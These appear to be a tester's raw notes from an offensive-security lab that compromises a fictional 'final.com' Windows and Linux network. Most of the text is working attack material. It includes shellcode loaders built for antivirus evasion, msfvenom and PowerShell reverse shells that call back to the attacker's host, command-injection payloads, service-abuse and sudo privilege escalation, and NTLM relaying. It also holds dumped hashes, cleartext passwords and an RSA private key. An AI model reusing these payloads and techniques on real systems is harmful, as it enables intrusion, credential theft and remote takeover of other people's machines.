172.16.X.

180
172.16.X.183
172.16.X.184
172.16.X.187
172.16.X.188
172.16.X.192
172.16.X.194
172.16.X.197
192.168.x.181
192.168.x.189

192.168.x.181
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Home Page - Final Application
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: WEB05
| DNS_Domain_Name: final.com
| DNS_Computer_Name: web05.final.com
| DNS_Tree_Name: final.com
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-16T13:35:05+00:00
| ssl-cert: Subject: commonName=web05.final.com
| Not valid before: 2020-10-26T12:28:25
|_Not valid after: 2021-04-27T12:28:25
|_ssl-date: 2021-02-16T13:35:07+00:00; -54s from scanner time.
9090/tcp open zeus-admin?
| fingerprint-strings:
| JavaRMI, LANDesk-RC, NULL:
|_ This is Zen HelpDesk, please perform the required authentication
1 service unrecognized despite returning data. If you know the service/ver

192.168.x.189
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FIREWALL02
| NetBIOS_Domain_Name: FIREWALL02
| NetBIOS_Computer_Name: FIREWALL02
| DNS_Domain_Name: firewall02
| DNS_Computer_Name: firewall02
| Product_Version: 10.0.17763
|_ System_Time: 2021-02-16T13:40:25+00:00
| ssl-cert: Subject: commonName=firewall02
| Not valid before: 2020-10-25T21:26:20
|_Not valid after: 2021-04-26T21:26:20
|_ssl-date: 2021-02-16T13:41:05+00:00; -6s from scanner time.
49669/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: -6s, deviation: 0s, median: -6s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-16T13:40:27
|_ start_date: N/A
Then we can upload aspx files here and go to them to trigger it

So we do same aspx file as in challenge #2

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f aspx
-o 3.aspx

Then I open aspx and add encryption to it. So we first use this caesar encrypt helper:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace CaesarEncrypt
{
class Program
{
static void Main(string[] args)
{
byte[] buf = new byte[685] {shellcodeHere };

byte[] encoded = new byte[buf.Length];

 for (int i = 0; i < buf.Length; i++)
{
encoded[i] = (byte)(((uint)buf[i] + 5) & 0xFF);
}
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("0x{0:x2}, ", b);
}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}

Then in 3.aspx, I modify it to this:

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.IO" %>
<script runat="server">
private static Int32 MEM_COMMIT=0x1000;
private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32
flAllocationType,IntPtr flProtect);

[System.Runtime.InteropServices.DllImport("kernel32")]
private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr
lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);

[System.Runtime.InteropServices.DllImport("kernel32.dll", SetLastError = true,ExactSpelling

= true)]
private static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize,
UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
[System.Runtime.InteropServices.DllImport("kernel32.dll")]
private static extern IntPtr GetCurrentProcess();

protected void Page_Load(object sender, EventArgs e)

{
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,
0);
if(mem == null)
{
return;
}
 byte[] oe7hnH0 = new byte[685] {shellcodeHere};

for(int i = 0; i < oe7hnH0.Length; i++)

{
oe7hnH0[i] = (byte)(((uint)oe7hnH0[i] - 5) & 0xFF);
}

IntPtr uKVv = VirtualAlloc(IntPtr.Zero,(UIntPtr)oe7hnH0.Length,MEM_COMMIT,

PAGE_EXECUTE_READWRITE);
System.Runtime.InteropServices.Marshal.Copy(oe7hnH0,0,uKVv,oe7hnH0.Length);
IntPtr xE34tIARlB = IntPtr.Zero;
IntPtr iwuox = CreateThread(IntPtr.Zero,UIntPtr.Zero,uKVv,IntPtr.Zero,0,ref xE34tIARlB);
}
</script>

meterpreter > getuid

Server username: IIS APPPOOL\DefaultAppPool
meterpreter > sysinfo
Computer : WEB05
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : FINAL
Logged On Users : 9
Meterpreter : x64/windows

SeImpersonatePrivilege Impersonate a client after authentication Enabled

So let’s priv esc using this

c:\inetpub>more local.txt
more local.txt
09b72e94ac6c57f4171aab83f205e320

To generate the encrypted shellcode with XOR, I do:

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.X.Y LPORT=443 -f raw -
o rulon.bin
root@kali:~/Ogimmeshellec/Lab# python xorenrypt.py rulon.bin

Then compile the gimmeshell.exe project on Windows private VM, which contains this code:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace gimmeshell
{
class Program
{
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint
flProtect);
[DllImport("kernel32.dll")]
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr
lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport("kernel32.dll")]
static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

[DllImport("kernel32.dll")]
static extern void Sleep(uint dwMilliseconds);

private static byte[] xor(byte[] cipher, byte[] key)

{

byte[] xored = new byte[cipher.Length];

for (int i = 0; i < cipher.Length; i++)

{
xored[i] = (byte)(cipher[i] ^ key[i % key.Length]);
}

return xored;
}

static void Main(string[] args)

{
DateTime t1 = DateTime.Now;
Sleep(4000);
double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
if (t2 < 1.5)
{
 return;
}

string key = "a70f8922029506d2e37f375fd638cdf9e2c039c8a1e6e01189eeb4efb";

byte[] xorbuf = { encryptedShellcode };
byte[] buf = xor(xorbuf, Encoding.ASCII.GetBytes(key));
int size = buf.Length;

IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);

Marshal.Copy(buf, 0, addr, size);
IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
IntPtr.Zero, 0, IntPtr.Zero);
WaitForSingleObject(hThread, 0xFFFFFFFF);

}
}
}

Then name it rulon.exe in c:\windows\tasks

Then compile the PrintSpooferPrivesc from PDF

Then run the below commands

dir c:\windows\tasks

Directory: C:\windows\tasks

Mode LastWriteTime Length Name

---- ------------- ------ ----
-a---- 2/16/2021 6:03 AM 6144 rulon.exe
-a---- 2/16/2021 6:04 AM 7680 PrintRulon.exe
-a---- 2/16/2021 6:09 AM 158720 SpoolSample.exe

PS C:\windows\system32\inetsrv> c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss

c:\windows\tasks\PrintRulon.exe \\.\pipe\test\pipe\spoolss
^Z
Background channel 1? [y/N] y
meterpreter > shell
Process 2300 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>c:\windows\tasks\SpoolSample.exe web05 web05/pipe/test

c:\windows\tasks\SpoolSample.exe web05 web05/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

c:\windows\system32\inetsrv>^Z
Background channel 2? [y/N] y
meterpreter > channel -i 1
Interacting with channel 1...

Found sid S-1-5-18

Impersonated user is: NT AUTHORITY\SYSTEM
PS C:\windows\system32\inetsrv>
[*] https://192.168.X.Y:443 handling request from 192.168.x.181; (UUID: fvhay8aw) Staging x64
payload (202329 bytes) ...
[*] Meterpreter session 3 opened (192.168.X.Y:443 -> 192.168.x.181:49785) at 2021-02-16
15:12:07 +0100

3 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WEB05 192.168.X.Y:443 -

> 192.168.x.181:49785 (192.168.x.181)

Then we are system!

more c:\users\administrator\Desktop\proof.txt
89f4c005905e38f0b2da8699845c2c7d

Secret : _SC_Service1 / service 'Service1' with username : [email protected]

cur/text: FGjksdff89sdfj

RID : 000001f4 (500)

User : Administrator
LM :
NTLM : 9689cee5c72d2ef437de593af89bb4ff

* Username : adminWebSvc
* Domain : FINAL
* NTLM : b0df1cb0819ca0b7d476d4c868175b94

* Username : WEB05$
 * Domain : FINAL
* NTLM : ad2a0eacfd4c546f92b56018547a68dd

vi7&QE

.\SharpHound.exe --CollectionMethod All --Domain final.com

The user [email protected] is a member of the group

[email protected].

The members of the group [email protected] have the capability to change the user
[email protected]'s password without knowing that user's current password.
$credsrulon = New-Object System.Management.Automation.PSCredential
("final.com\adminWebSvc", (ConvertTo-SecureString "FGjksdff89sdfj" -AsPlainText -Force))
$UserPassword = ConvertTo-SecureString 'PasswordRulon123!' -AsPlainText -Force
Set-DomainUserPassword -Identity nina -AccountPassword $UserPassword -Credential
$credsrulon -Verbose
VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'nina'
VERBOSE: [Set-DomainUserPassword] Password for user 'nina' successfully reset

Get-DomainComputer -Properties DnsHostName

dnshostname
-----------
dc01.final.com
sql03.final.com
sql11.final.com
web05.final.com
jump03.final.com
ansible06

172.16.X.180 - dc01.final.com
172.16.X.187 - sql03.final.com
172.16.X.188 - sql11.final.com
172.16.X.183 - jump03.final.com
172.16.X.184 - ansible06
172.16.X.192 - dc02.dev.final.com
172.16.X.194 - web06.dev.final.com
172.16.X.197 - appserver05.dev.final.com

Then we portscan them:

Invoke-Portscan -Hosts 172.16.X.184 -Ports
"21,22,23,53,69,71,80,88,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,
5985,5986,6667,6868,7777,7878,8000,8080,1521,3306,3389,5801,5900,5555,5901" | Select -
ExpandProperty openPorts

172.16.X.180 - dc01.final.com
53
88
139
389
445
5985
3389

172.16.X.187 - sql03.final.com
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL03
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql03.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-02-19T06:37:50
| Not valid after: 2051-02-19T06:37:50
| MD5: fefa d01e f133 358e 0ca5 53a9 2875 3260
|_SHA-1: e44e 17aa 67b7 ceaa 3301 dcd8 82ad 19c1 144e b73d
|_ssl-date: 2021-02-19T12:41:52+00:00; -47s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=sql03.final.com
| Issuer: commonName=sql03.final.com
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-10-26T11:06:48
| Not valid after: 2021-04-27T11:06:48
| MD5: 47f4 a744 ca7a ea72 860a 67bb 285d 5843
|_SHA-1: 9650 1b2b 48d8 4029 956a e83f 32f4 d5e0 7a73 1ccd
|_ssl-date: 2021-02-19T12:41:52+00:00; -47s from scanner time.
MAC Address: 00:50:56:86:A0:9C (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: -47s, deviation: 0s, median: -47s
| ms-sql-info:
| 172.16.X.187:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-19T12:41:45
|_ start_date: N/A

172.16.X.188 - sql11.final.com
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 15.00.2000.00
| ms-sql-ntlm-info:
| Target_Name: FINAL
| NetBIOS_Domain_Name: FINAL
| NetBIOS_Computer_Name: SQL11
| DNS_Domain_Name: final.com
| DNS_Computer_Name: sql11.final.com
| DNS_Tree_Name: final.com
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-02-18T07:40:16
|_Not valid after: 2051-02-18T07:40:16
|_ssl-date: 2021-02-18T10:28:44+00:00; -18s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=sql11.final.com
| Not valid before: 2020-10-26T11:07:15
|_Not valid after: 2021-04-27T11:07:15
|_ssl-date: 2021-02-18T10:28:44+00:00; -18s from scanner time.
5985/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
MAC Address: 00:50:56:86:A8:60 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: -18s, deviation: 0s, median: -18s
| ms-sql-info:
| 172.16.X.188:1433:
| Version:
| name: Microsoft SQL Server
| number: 15.00.2000.00
| Product: Microsoft SQL Server
|_ TCP port: 1433
|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-18T10:28:38
|_ start_date: N/A

172.16.X.184 - ansible06
22

172.16.X.194 - web06.dev.final.com
80/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final Web Store
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=web06.dev.final.com
| Not valid before: 2020-10-26T11:34:37
|_Not valid after: 2021-04-27T11:34:37
|_ssl-date: 2021-02-18T09:24:21+00:00; -1s from scanner time.
5985/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.2.34)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34
|_http-title: Final CMS App
MAC Address: 00:50:56:86:EE:82 (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_p2p-conficker: ERROR: Script execution failed (use -d to debug)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-18T09:24:11|_ start_date: N/A

172.16.X.197
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)

Then we setup socks4a and autoroute through meterpreter by doing:

PS C:\Users> ^Z
Background channel 2? [y/N] y

meterpreter > run autoroute -s 172.16.X.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.X.0/255.255.255.0...
[+] Added route to 172.16.X.0/255.255.255.0 via 192.168.x.181
[*] Use the -p option to list all active routes
meterpreter > background
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf5 auxiliary(server/socks4a) > run -j
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server

Then to make sure proxychains work, I can login as administrator on web05 machine:
proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes
:9689cee5c72d2ef437de593af89bb4ff [email protected]

Tommy is a user on Linux machine

memberof : {CN=LinuxUsers,OU=FinalGroups,DC=final,DC=com,
CN=MgtUsers,OU=FinalGroups,DC=final,DC=com}

Then I run BloodHound with new creds:

.\SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn --domain dev.final.com --
ldapusername nina --ldappassword 'PasswordRulon123!'

.\SharpHound.exe --CollectionMethod All,GPOLocalGroup,LoggedOn --domain final.com --

ldapusername nina --ldappassword 'PasswordRulon123!'

Then we see in BH this:

The members of the group [email protected] have the capability to create a Remote
Desktop Connection with the computer JUMP03.FINAL.COM.

And Nina is a member of MgtUsers

So let’s RDP to jump03 - 172.16.X.183

hostname
jump03
whoami
final\nina

more local.txt
911430e89bd98320be4673732818eaa0

[*] Found 1 result(s).

Name : SNMPTRAP
ImagePath : C:\Windows\System32\snmptrap.exe
User : NT AUTHORITY\LocalService
Status : Stopped
UserCanStart : True
UserCanRestart : True
To get my shell back, I do:
msfconsole -x 'use auxiliary/server/socks4a; set SRVPORT 1080; set SRVHOST 127.0.0.1; run
-j; use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_https; set LHOST
192.168.X.Y; set LPORT 443; set EXITONSESSION false; set AutoRunScript "autoroute -s
172.16.X.0/24"; run'

Upload 3.aspx, then I can connect to web05:

proxychains python3 /opt/Windows/Impacket/examples/psexec.py -hashes
:9689cee5c72d2ef437de593af89bb4ff [email protected]

Then I find web06.final.com by enumerating get-domainuser from jump03

So let’s portscan it:

IEX(New-Object Net.webclient).downloadString('http://192.168.X.Y/Invoke-Portscan.ps1')
Invoke-Portscan -Hosts 172.16.X.194 -Ports
"21,22,23,53,69,71,80,88,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,
5985,5986,6667,6868,7777,7878,8000,8080,1521,3306,3389,5801,5900,5555,5901" | Select -
ExpandProperty openPorts
80
445
5985
8080
3389

Then we can reach web06.dev.final.com through proxychains

On port 8080, we have:

http://172.16.X.194:8080/

This is the CMS development app

Diana
CN=Domain Admins,CN=Users,DC=dev,DC=final,DC=com so Domain admin on dev.final.com

C:\Users\nina>sc config SNMPTRAP obj= "NT AUTHORITY\SYSTEM" password= ""

[SC] ChangeServiceConfig SUCCESS

C:\Users\nina>sc config snmptrap binpath= "c:\users\nina\nc64.exe 192.168.X.Y 80 -e

cmd.exe"
[SC] ChangeServiceConfig SUCCESS

C:\Users\nina>sc qc snmptrap
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: snmptrap
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\users\nina\nc64.exe 192.168.X.Y 80 -e cmd.exe
LOAD_ORDER_GROUP :
TAG :0
DISPLAY_NAME : SNMP Trap
DEPENDENCIES :
SERVICE_START_NAME : NT AUTHORITY\SYSTEM
Invoke-ServiceAbuse -ServiceName 'SNMPTRAP'

ServiceAbused Command
------------- -------
SNMPTRAP net user john Password123! /add && net localgroup Administrators john /add

net users

User accounts for \\JUMP03

-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
john WDAGUtilityAccount
The command completed successfully.

So it worked! John is now admin, and we can now RDP to jump03 and grab proof.txt:

89f4c005905e38f0b2da8699845c2c7d

Then we get tommy’s id_rsa:

more id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEApDD/vFcPlFAHQyy/3ZDJwlm1X3mgeEUoAr5PfxJzX/TRf2A+
AYlQOgZxBaoOC9CTwJ+7jSkJvjAUq7P5IDZFcLb+hEXUt8DxG37+zm8AwmRLVysF
S/qMRgznQ2JnvuvbhTam6YowbcgQXcCx+a6wAhL/4o4/STwg0Xbm9Hek7sevbWqa
vLLikbh4Z6JQ0hEVudT20gwkY5nOeDnXB0A8yhTJvBXQB/LYgflAAclX/jwpa6h7
MZe2fSdPpkIWJoDLgVkVg5j5EsAn8mZdf6EvPWYAy3DHpOC8UUwYaNdszrCg+0Rg
KxyoVikHk7m6ib4z9E8SxoUOXVMfnw6NWLzZqwIDAQABAoIBAQCPNPGJCwJaoKaE
7531GVjwe6AXQxU0cVUhd24M7kHVOsoS6BWM74Aa7A1eHGGd6nFEe81wpI+L45HT
5OhwMQXF9sXtBp8vGkjxa4XA9c5avnF7+Njo2QHKA20eN9E3E65m9TEF1vLAfdPQ
gcZ5eOSpGns21kzaimgxahyss0IWxIvAY/dSs4dbP+/7NZPQjnw7lpEPsMlmFfFn
xTljuhqWfeZHEdqH+A8Qx7Hflema4MYZ4labOzWUm2oXTbNpK7CiElnmTvWIOdiv
nesJtH+zhzxn6ydmvQlP/mtFYsNFhTuVjJ4Grzb70flI/IJztn7xnnJQhfLnZ/Yg
++58j91JAoGBANk120uDbGgQN3tvuXEklyXvf6jF1wISF8EAWVEa90Cl8wAkyvL8
N7gKAvSR7CKpuKOxPRqUw0UoMG5fPOapy0B0l7ipm15/d+ybdrEiOS/2MLyWG3aX
wMBAPvwCU2HrplxoW65ALeVhfyS0EiI5qfgfl7XJeywRMyUbjc4lRTYNAoGBAMGD
ShJqQz2CNcz+QyOuBXe8vdvdfNqF20k8dh7QGopo0n2ktazDWHWJEkKuGpYc9tmv
ZnG8dDQQ1hWv36gCv4EgWWNej8kKLFuGalfVWV9wBYnc602BNS1SZjvDyn354hFT
k5TeSLlnGtueWDAU9SLRSvo7P9XiuOEaO9HHy9iXAoGBAJfPGFGSrPWeP+i5kTYO
iMUuul5Ox5Le6lMt1z7kReKdGVUEYgOpW5f5B0+/nPYtAKsHeNlXF5MCH7dEQOBF
05Rc6J1bjQdit4JatX3fmXB39GAZ2V/td/3l6R9g0L4jYMY8+bazjGBA4AfbAsGA
49ZS3kljY/7Mlp5cv6NQUSsRAoGAemJ2Lj9WV0hKjmMgQyiD/L45tRvXIr0VerPq
YIJsxqyUszHAVIsXHv6ZteI2nkmjNPlhaP0u4N7lBsI8SR2z0A6NefMMLLFqbFgO
WY5s/5bxacd2aYYWA5vhXFrvbczj1OFurPAIPnme2tbCH2ahwmtrZ+ag8Lx7AKJ+
wqYBnfECgYEA0wv11GTujeaG7QS9c5nVPKAMQfNTSbHlrg57Y4VBS4h9V0ZkbODU
a3g2uuwhOwmRs07O7S6p8rDy/oJaP0OoOdNbVEkix8jcoa3nGyyFOKaHkYMtiISJ
kHLEnxkYRBvBUSHkOukFmx93fwH2Z13FL9IRQ0Tf6BqeQAWa62QEXRc=
-----END RSA PRIVATE KEY-----

* Username : tommy
* Domain : FINAL
* NTLM : 5ad27ee8000951e0669fab25f73f9d8a
* Username : Administrator
* Domain : JUMP03
* NTLM : 935a2a886200d2bf5040b1344b2d33d7

* Username : tommy
* Domain : FINAL.COM
* Password : 89dsfsji43A

[NL$2 - 11/28/2020 12:39:13 PM]

RID : 00000458 (1112)
User : FINAL\tommy
MsCacheV2 : 3250e1e50bbaf0a3ac53bedf130c692f

[NL$3 - 11/2/2020 12:58:05 PM]

RID : 000001f4 (500)
User : FINAL\Administrator
MsCacheV2 : c455fba4c33031e45641639cc46cc25a

proxychains python3 psexec.py -hashes :935a2a886200d2bf5040b1344b2d33d7

[email protected]

Then we can ssh to ansible:

proxychains ssh -i tommy_rsa final\\[email protected]
[email protected]@ansible06:~$ cat local.txt
320cadccfa931d8444d263fd38352908

[email protected]@ansible06:/$ sudo -l
Matching Defaults entries for [email protected] on ansible06:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User [email protected] may run the following commands on ansible06:

(ALL) NOPASSWD: /usr/bin/lua

sudo /usr/bin/lua -e 'os.execute("/bin/sh")'

So then we are root

# cat proof.txt
475e008585daee29fbc9d0fc4a5f4491

ansiblesvc:$6$ZLO9O2l.NR91p0ZL$ASnOBAvHtvZOi1HUhHfvE5XkIQhSdXLwWNzEysD3cqyB
BL40/JJwB2MZtZwMKAwnYxwR4qwNvjVhW.TX.MwA00:18562:0:99999:7:::

In .bash_history of user ansiblesvc, we find:

ssh-copy-id [email protected]
ping appserver05.dev.final.com
ssh-copy-id [email protected]

So here is another machine I haven’t seen earlier, which has IP 172.16.X.197

If we check /etc/ansible/hosts, we have:

[appservers]
appserver05.dev.final.com

Then let’s upload nmap and portscan the IP’s earlier.

root@ansible06:/home# su - ansiblesvc
ansiblesvc@ansible06:~$ ansible appservers -a "whoami"
appserver05.dev.final.com | CHANGED | rc=0 >>
ansiblesvc

So we can execute commands on appservers when we are using ansiblesvc.

To setup a more stable proxy from jump03, I do:

/opt/Linux/chisel server -p 5989 --reverse --socks5
.\chisel64.exe client -v 192.168.X.Y:5989 R:1080:socks
Then from ansible06, I can do:
ssh [email protected]

To get a shell on appserver05

ansiblesvc@appserver05:~$ sudo -l
Matching Defaults entries for ansiblesvc on appserver05:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ansiblesvc may run the following commands on appserver05:

(ALL) NOPASSWD: ALL
ansiblesvc@appserver05:~$ sudo su -
root@appserver05:~#

root@appserver05:~# cat proof.txt

f50e80a9fb44bfb4d440631e796f3f56 (192.188.X.197)

root:$6$veLzkM9YL5o0gWT.$YW5Ou1ImNB5AlItKIcVUKK1eMaXmQOUiKH5uEOKFyRZWXsx
Xf.XPQvCHeKK..4jX93vTca3LvrpmpsLxKXxPx1:18568:0:99999:7:::

ansiblesvc:$6$pw6sPHO5F2ChVCQW$8PvOIIhOW.0XYRZswcKs8cWD4RQVN.jdt.qt7wzH5FC
.NxBIu2wfcOnpsiJ1IT7rLaRRgYY7JXtHHoZGttYns0:18562:0:99999:7:::

Then it works to connect to both sql03 and sql11 using tommy’s credentials we found on jump03

proxychains python3 /opt/Windows/Impacket/examples/mssqlclient.py

tommy:[email protected] -port 1433 -windows-auth
proxychains python3 /opt/Windows/Impacket/examples/mssqlclient.py
tommy:[email protected] -port 1433 -windows-auth

ERROR(SQL11\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object

'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.

We don’t have permission to enable xp_cmdshell.

So we probably need to do some relaying here again.

Then smb signing is disabled on WEB06:

SMB 172.16.X.194 445 WEB06 [*] Windows 10.0 Build 17763 (name:WEB06)
(domain:final.com) (signing:False) (SMBv1:False)

So let’s try to relay to that one.

proxychains python3 /opt/Windows/Impacket/examples/ntlmrelayx.py --no-http-server -
smb2support -t smb://172.16.X.194

EXECUTE ('master.sys.xp_dirtree "\\192.168.X.Y\a"')

[*] Authenticating against smb://172.16.X.194 as FINAL/SQLSVC11 SUCCEED

[*] SMBD-Thread-3: Connection from FINAL/[email protected] controlled, but there
are no more targets left!
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Then appserver05 is in dev.final.com domain, and if we remember from earlier on port web06, I
had:
The current release version is 0.4.5.1 which is available on port 8080 from both final.com and
dev.final.com

The current insider version is 0.4.7.2 which is available on port 8081 from dev.final.com only

So we can access port 8081 from appserver05

To setup the proxy, I do:

proxychains sshuttle -v -e "ssh -i id_rsa" -r [email protected] 172.16.X.0/24

Then I can reach http://172.16.X.194:8081/ without any socks proxy in firefox addon

If I enter: 127.0.0.1 && whoami

I get: = 0ms, Maximum = 0ms, Average = 0ms dev\apachesvc

So let’s spawn shell on web06 machine now.

127.0.0.1 && curl http://192.168.X.Y/nc64.exe -O c:\windows\tasks\nc64.exe

127.0.0.1 && c:\windows\tasks\nc64.exe 192.168.X.Y 80 -e cmd.exe

Then I spawn shell with:

-Object Net.webclient).downloadString('http://192.168.X.Y/Candlestick.ps1'); IEX(New-Object
Net.webclient).downloadString('http://192.168.X.Y/drop4.ps1')

root@kali:~/Ogimmeshellec/Lab# cat drop4.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.X.Y',443);$stream =
$client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0,
$bytes.Length)) -ne 0){;$data = (New-Object -TypeName
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String
);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte =
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$
stream.Flush()};$client.Close()

whoami
dev\apachesvc
hostname
web06

more proof.txt
150a6e6452dbe96b8262243842b23911

* Username : sqlsvc01
* Domain : DEV
* NTLM : 077a55c458dc4002dfdc5321a7659526

* Username : apacheSvc
* Domain : DEV
* NTLM : a6a5f008019060ab8079feca697f9f73

Secret : _SC_Apache2.4 / service 'Apache2.4' with username : [email protected]

cur/text: fgodSDOJFSdjk53df

